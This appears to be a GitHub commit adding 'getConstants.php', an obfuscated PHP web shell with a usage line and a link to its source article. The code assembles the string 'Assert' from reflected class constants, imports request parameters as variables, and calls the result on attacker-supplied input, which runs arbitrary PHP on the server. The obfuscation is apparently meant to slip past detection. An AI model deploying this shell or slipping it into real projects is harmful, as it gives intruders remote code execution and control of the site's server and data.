Create getConstants.php

use: xxxxxx/getConstants?1=phpinfo()
from : https://xz.aliyun.com/t/8684
This commit is contained in:
tennc 2020-12-28 01:08:19 +08:00 committed by GitHub
parent b66c3bb616
commit fd35f195c1
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

27
php/getConstants.php Normal file
View file

@ -0,0 +1,27 @@
<?php
class Test
{
const a = 'As';
const b = 'se';
const c = 'rt';
public function __construct()
{
}
}
$para1;
$para2;
$reflector = new ReflectionClass('Test');
for ($i=97; $i <= 99; $i++) {
$para1 = $reflector->getConstant(chr($i));
$para2.=$para1;
}
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
$para2($_value);